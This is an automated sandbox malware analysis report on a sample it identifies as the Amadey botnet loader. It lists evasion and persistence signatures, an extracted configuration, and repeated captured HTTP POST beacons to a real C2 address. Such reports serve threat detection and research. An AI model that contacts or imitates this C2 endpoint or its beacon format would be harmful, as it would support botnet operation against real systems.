Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UyiH4t5dph.exe

Overview

General Information

Sample name:UyiH4t5dph.exe
renamed because original name is a hash value
Original sample name:9d38889192a887e1128ec41dd417fb6d.exe
Analysis ID:1578883
MD5:9d38889192a887e1128ec41dd417fb6d
SHA1:bf6b8a7c9ea4519ee2b4233375b9cf2cc9c7840b
SHA256:b23adb76c30005dc9d5391fd1f1218b36b6b0cb85b63f5cb9aeeb0cb01d77963
Tags:exeuser-abuse_ch
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • UyiH4t5dph.exe (PID: 7852 cmdline: "C:\Users\user\Desktop\UyiH4t5dph.exe" MD5: 9D38889192A887E1128EC41DD417FB6D)
    • skotes.exe (PID: 8080 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 9D38889192A887E1128EC41DD417FB6D)
  • skotes.exe (PID: 2216 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 9D38889192A887E1128EC41DD417FB6D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
    00000006.00000003.1959422053.00000000050C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      00000002.00000003.1452607613.00000000046A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            2.2.skotes.exe.be0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              0.2.UyiH4t5dph.exe.2d0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                6.2.skotes.exe.be0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-20T16:09:42.738579+010028561471A Network Trojan was detected192.168.2.849723185.215.113.4380TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: UyiH4t5dph.exeAvira: detected
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                  Source: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 47%
                  Source: UyiH4t5dph.exeVirustotal: Detection: 54%Perma Link
                  Source: UyiH4t5dph.exeReversingLabs: Detection: 47%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                  Source: UyiH4t5dph.exeJoe Sandbox ML: detected
                  Source: UyiH4t5dph.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49723 -> 185.215.113.43:80
                  Source: Malware configuration extractorIPs: 185.215.113.43
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                  Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeCode function: 0_2_002DE0C0 recv,recv,recv,recv,0_2_002DE0C0
                  Source: unknownHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: skotes.exe, 00000006.00000003.2274997620.00000000012F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                  Source: skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php.WSE
                  Source: skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php32i
                  Source: skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php8
                  Source: skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2274997620.00000000012F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php9
                  Source: skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php:
                  Source: skotes.exe, 00000006.00000002.2685806269.00000000012B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpB
                  Source: skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2274997620.00000000012F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpD
                  Source: skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpE
                  Source: skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2274997620.00000000012F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpT
                  Source: skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpcoded8
                  Source: skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
                  Source: skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpi
                  Source: skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpiP
                  Source: skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpl
                  Source: skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
                  Source: skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2274997620.00000000012F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpv
                  Source: skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpve
                  Source: skotes.exe, 00000006.00000002.2685806269.00000000012B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/d

                  System Summary

                  barindex
                  Source: UyiH4t5dph.exeStatic PE information: section name:
                  Source: UyiH4t5dph.exeStatic PE information: section name: .idata
                  Source: skotes.exe.0.drStatic PE information: section name:
                  Source: skotes.exe.0.drStatic PE information: section name: .idata
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BFCB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,6_2_00BFCB97
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeCode function: 0_2_002D5C830_2_002D5C83
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeCode function: 0_2_002D735A0_2_002D735A
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeCode function: 0_2_003188600_2_00318860
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeCode function: 0_2_002D4DE00_2_002D4DE0
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeCode function: 0_2_002D4B300_2_002D4B30
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C278BB2_2_00C278BB
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C270492_2_00C27049
